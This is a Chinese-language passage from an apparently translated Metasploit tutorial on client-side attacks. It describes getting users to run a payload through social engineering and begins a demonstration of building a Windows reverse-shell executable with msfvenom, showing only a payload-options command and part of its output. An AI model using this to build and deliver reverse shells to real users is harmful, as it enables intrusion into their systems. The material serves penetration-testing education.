客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。
使用Metasploit执行客户端攻击的方式有很多种,我们将在这里演示其中的一些方法。
1、Metasploit二进制Payloads(有效载荷)
Metasploit似乎充满了有趣和有用的功能。其中之一就是能够从Metasploit有效载荷生成可执行文件。这在诸如社会工程等情况下非常有用; 如果你能让用户为你运行你的有效负载,没有理由去利用任何软件的麻烦。
我们来看一个如何做到这一点的简单例子。我们将生成一个反向shell有效载荷,在远程系统上执行它,并获得我们的shell。为此,我们将使用命令行工具msfvenom。该命令可用于生成有效载荷以用于许多位置,并提供各种输出选项,从perl到C到raw。我们对' -f exe '选项提供的可执行输出感兴趣。
我们将生成一个Windows反向shell可执行文件,它将通过端口31337连接到我们。
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:
Name: Windows Command Shell, Reverse TCP Stager